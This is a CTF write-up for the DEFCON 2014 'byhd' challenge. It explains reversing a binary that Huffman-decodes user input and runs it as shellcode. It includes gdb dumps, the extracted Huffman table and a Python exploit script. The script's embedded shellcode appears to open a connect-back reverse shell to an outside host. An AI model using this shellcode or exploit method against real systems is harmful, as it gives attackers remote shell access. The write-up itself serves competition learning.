I solved this challenge with my teammate Acuros.
After a quick glanceing at the byhd binary, I found out that the task is straightforward. this is a fork-accepting binary which takes some user input. then, the binary runs some complicated recursive algorithm which generates a data using the user input. finally, the binary executes the generated data as a shellcode. so, what we should do is clear : analysis and reverse the algorithm inside the binary.
The binary loaded its own image file into memory then created a byte histogram by counting each bytes.
The result of this algorithm creates this ...
0x60c470: 0x000023e2 0x000000ee 0x000000ae 0x0000004c
0x60c480: 0x00000032 0x0000001a 0x00000034 0x0000006f
0x60c490: 0x0000005b 0x00000012 0x00000025 0x0000000a
0x60c4a0: 0x00000029 0x00000020 0x00000030 0x00000059
0x60c4b0: 0x0000005b 0x00000017 0x00000036 0x00000006
0x60c4c0: 0x00000030 0x0000000a 0x00000006 0x00000006
0x60c4d0: 0x00000020 0x00000009 0x0000000b 0x0000000c
0x60c4e0: 0x00000028 0x00000002 0x00000007 0x00000010
0x60c4f0: 0x00000091 0x00000007 0x00000014 0x00000005
0x60c500: 0x00000021 0x00000043 0x00000009 0x00000003
0x60c510: 0x0000001c 0x00000017 0x00000008 0x00000004
0x60c520: 0x00000009 0x0000001b 0x00000045 0x0000000b
0x60c530: 0x00000033 0x00000018 0x00000008 0x00000007
0x60c540: 0x00000013 0x00000002 0x00000008 0x00000006
0x60c550: 0x0000000e 0x00000009 0x00000009 0x0000000b
0x60c560: 0x00000003 0x00000005 0x00000018 0x00000009
0x60c570: 0x000000b7 0x0000004f 0x00000009 0x00000028
0x60c580: 0x00000013 0x000001a3 0x0000000b 0x00000009
0x60c590: 0x000002a3 0x0000000f 0x00000007 0x00000001
0x60c5a0: 0x00000014 0x00000013 0x00000005 0x00000011
0x60c5b0: 0x00000022 0x00000001 0x0000003a 0x0000000c
... (there are 0x23e2 zeros, 0xee ones, and 0xae twos, etc)
Then, the binary converts each histogram information into an 32byte object which contains the (index, value) pair of the histogram data.
0x607c20: 0x00608c00 0x00000000 0x00608c30 0x00000000
0x607c30: 0x00608c60 0x00000000 0x00608c90 0x00000000
0x607c40: 0x00608cc0 0x00000000 0x00608cf0 0x00000000
0x607c50: 0x00608d20 0x00000000 0x00608d50 0x00000000
0x607c60: 0x00608d80 0x00000000 0x00608db0 0x00000000
0x607c70: 0x00608de0 0x00000000 0x00608e10 0x00000000
0x607c80: 0x00608e40 0x00000000 0x00608e70 0x00000000
0x607c90: 0x00608ea0 0x00000000 0x00608ed0 0x00000000
0x607ca0: 0x00608f00 0x00000000 0x00608f30 0x00000000
0x607cb0: 0x00608f60 0x00000000 0x00608f90 0x00000000
0x607cc0: 0x00608fc0 0x00000000 0x00608ff0 0x00000000
0x607cd0: 0x00609020 0x00000000 0x00609050 0x00000000
if we inspect the object for 'zero', 'one' we can see this. The (index, value) is each located from offset 0x10, 0x1c of the object
(gdb) x/10wx 0x6082a0
0x6082a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x6082b0: 0x00000000 0x00000000 0x00000000 0x000023e2
0x6082c0: 0x00000000 0x00000000
(gdb) x/10wx 0x6082d0
0x6082d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x6082e0: 0x00000001 0x00000000 0x00000000 0x000000ee
0x6082f0: 0x00000000 0x00000000
After this step, the binary creates a tree structure with the 256 historgram objects. after reversing this step, I could infer the complete structure of the object (which is a node of tree).
[next][prev][value][count]
However, the tree generation algorithm seems too comlicated to reverse. So I just skipped the tree generation part and simply inspected the generated tree with debugger. It was evident that the tree was huffman code generation tree.
After the tree is generated, user input is decoded using this tree. It can be reversed from 0x401c07.
The huffman decoded user input is then, simply executed via mmap and call rax from 0x401ca2
So, In a nut shell, the binary creates a huffman tree with his own binary data, then takes user input(maximum 256bytes) as a huffman encoded data. The binary decodes user data using the generated huffman tree and executes it as a shellcode. Therefore, all I need to do is encode my shellcode with huffmantree generated by the task binary.
It seemed easy from now, I googled a huffman tree generation example source code than created the huffmantree as the task binary did. However, the generated tree was similar but different due to some unknown reason. the task binary must used slightly diffrent algorithm...? or my example huffman generation code was wrong?? I didn't know the truth, anyway rather than analyzing the tree generation algorithm, I took a different approach. I tried to hook the task binary with LD_PRELOAD then extract the generated tree inside the task binary memory. First, I patched the binary to invoke the exit() function after the tree was generated. then, I hooked the exit() using LD_PRELOAD.
However, I couldn't figure out the pointer address of the root node :( I felt so stupid, and got angry :( , there must be some way to extract the tree out of the binary..!! After some digging, I dumped the entire heap memory out of GDB then gave it to my teamate. From this point, my teamate solved the rest of the task. He programmed a python script which extracts the tree information from the dumped memory, despite this was not a forensic challenge :) After an hour, he completed to exact the tree and we got the huffman encoding mapping.
Using this information, we encoded a remote shellcode and the task was done.
root@ubuntu:/home/meltdown# cat tree.txt
00 0
01 100111
02 1101110
03 11000000
04 111100011
05 1111101011
06 111110011
07 1001001
08 11100011
09 1011100001
0a 101111011
0b 11001000111
0c 110010111
0d 101001101
0e 111010011
0f 11100001
10 11100010
11 1110000011
12 111110111
13 111010000001
14 111010010
15 11001000110
16 111010100011
17 111010100010
18 101001111
19 10111001001
1a 11100000011
1b 11101000001
1c 110001111
1d 1010000000001
1e 10010000001
1f 1010011001
20 1011101
21 10011000101
22 1100000101
23 110010000111
24 101010101
25 10101111
26 10111001000
27 1111000100111
28 100101111
29 1110100001
2a 10101001101
2b 101000000001
2c 10111100111
2d 1111101101
2e 10110010
2f 11100000010
30 111110001
31 1110101111
32 10101001100
33 10011000100
34 1011111001
35 1010101001001
36 10101001011
37 111010100001
38 1001000001
39 10111100110
3a 10111100101
3b 11100000001
3c 1111000100110
3d 110010000110
3e 1110101110
3f 10111100100
40 1110011
41 11000101
42 10111100011
43 110001110
44 1011111011
45 111111
46 11100000000
47 10111100010
48 11010
49 1010001011
4a 10011000011
4b 10100000000001
4c 1100100101
4d 1011111010
4e 110010000101
4f 1010111001
50 101011101
51 10101110001001
52 10011011
53 11101010011
54 1101111101
55 11000100
56 101010001011
57 10101110001000
58 1011000001
59 10101110000111
5a 1010101001000
5b 101001001
5c 10111100001
5d 101110011
5e 101010001010
5f 101100001
60 11011001
61 10010101
62 1101101001
63 1111101010
64 10110001
65 11110011
66 110010110
67 101110001
68 10101011
69 11001111
6a 101010001001
6b 10101001010
6c 111010001
6d 1110101101
6e 111100101
6f 110110001
70 100101110
71 1111000100101
72 10010001
73 10100011
74 1010110
75 11100101
76 1010001010
77 10011000010
78 1110101100
79 11111000001
7a 111010100000
7b 101010001000
7c 10101001001
7d 11100100
7e 111100000111
7f 11001000101
80 1010011101
81 10011000001
82 1111000100100
83 1100001
84 100101101
85 10010100
86 101001000
87 1111000100011
88 1010001001
89 111101
8a 10101001000
8b 111011
8c 111100000110
8d 10100001
8e 1010101000111
8f 1111000100010
90 110110000
91 1010101000110
92 101010000111
93 1111000100001
94 111100000101
95 1111000100000
96 110010000100
97 10101110000110
98 1010001000
99 1010101000101
9a 101010000110
9b 1010101000100
9c 10011000000
9d 10101110000101
9e 1111100000011
9f 101000000000001
a0 11001000100
a1 1111100000010
a2 1010101000011
a3 1111100000001
a4 1010101000010
a5 1111100000000
a6 101010000101
a7 101010000100
a8 1100100100
a9 1010101000001
aa 1010101000000
ab 1010111000111
ac 1001100111
ad 10101110000100
ae 101010000011
af 10101110000011
b0 11111010001
b1 100100000001
b2 101010000010
b3 10101110000010
b4 1001100110
b5 101010000001
b6 1110101011
b7 101010000000
b8 11011110
b9 10111100000
ba 1111000101
bb 1010011100
bc 1111001001
bd 110010000011
be 1111101100
bf 110000011
c0 10110011
c1 1101111100
c2 101000001
c3 110110101
c4 1111101001
c5 1111001000
c6 1111100001
c7 1100110
c8 110111111
c9 1001100101
ca 10100000011
cb 10101110000001
cc 1010100111
cd 1010111000110
ce 1110101010
cf 101000000000000
d0 11001010
d1 10101000111
d2 111100000100
d3 10100000010
d4 1001100100
d5 1010111000101
d6 1001100011
d7 100100000000
d8 10111111
d9 101010100111
da 10100000001
db 111100000011
dc 100100001
dd 10101110000000
de 101010100110
df 111100000010
e0 11011011
e1 101010100101
e2 10111110001
e3 11100000101
e4 110010011
e5 111100001
e6 1011000000
e7 10101000110
e8 101101
e9 11001110
ea 1011100000
eb 11000110
ec 111110010
ed 11111010000
ee 110010000010
ef 110010000001
f0 101111010
f1 110010000000
f2 111010000000
f3 1011100101
f4 1100000100
f5 11101010010
f6 10111110000
f7 1010011000
f8 10011010
f9 111100000001
fa 111100000000
fb 11100000100
fc 10100101
fd 1101101000
fe 100101100
ff 1000
root@ubuntu:/home/meltdown# cat send_shellcode.py
from socket import socket, AF_INET, SOCK_STREAM
int_to_bin = dict()
with open('tree.txt', 'r') as f:
data = f.read()
lines = data.split('\n')
for line in lines:
line = line.strip()
if not line:
continue
k, v = line.split(' ')
int_to_bin[chr(int(k, 16))] = v
shellcode = "\x48\x31\xC0\xB0\x01\x48\x89\xc6\x48\xFF\xC0\x48\x89\xC7\x48\x31\xD2\xB2\x06\xB0\x29\x0F\x05\x48\x89\xC7\x48\xB9\xFD\xFF\x7A\x69\x6E\x23\x26\x06\x66\x83\xF1\xFF\x51\x48\x89\xE6\x48\x31\xD2\xB2\x10\xB0\x2A\x0F\x05\x48\x31\xC0\x48\x31\xF6\xB0\x21\x0F\x05\x48\xFF\xC6\xB0\x21\x0F\x05\x48\x31\xC0\x48\x31\xD2\x50\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05"
s = socket(AF_INET, SOCK_STREAM)
s.connect(('byhd_147e0accdae13428910e909704b21b11.2014.shallweplayaga.me', 9730))
payload = '\x00\x01\x00\x00'
enced_shellcode = ''.join([int_to_bin[byte] for byte in shellcode])
enced_shellcode = enced_shellcode + '0' * (8-len(enced_shellcode)%8)
'''
tmp = []
for x in xrange(len(enced_shellcode)/8):
tmp.append(enced_shellcode[x*8: (x+1)*8][::-1])
enced_shellcode = ''.join(tmp)
'''
enced_shellcode = hex(int(enced_shellcode, 2))[2:-1]
print enced_shellcode
enced_shellcode = enced_shellcode.decode('hex')
payload += enced_shellcode
s.send(payload)
print s.recv(10240)
s.close()
'Games > CTF' 카테고리의 다른 글
DEFCON 2014 polyglot writeup (0) | 2014.05.21 |
---|---|
DEFCON 2014 bbgp writeup (2) | 2014.05.21 |
PlaidCTF 2014 kappa (0) | 2014.04.15 |
PlaidCTF 2014 ezhp (5) | 2014.04.15 |
PlaidCTF 2014 tenement (0) | 2014.04.15 |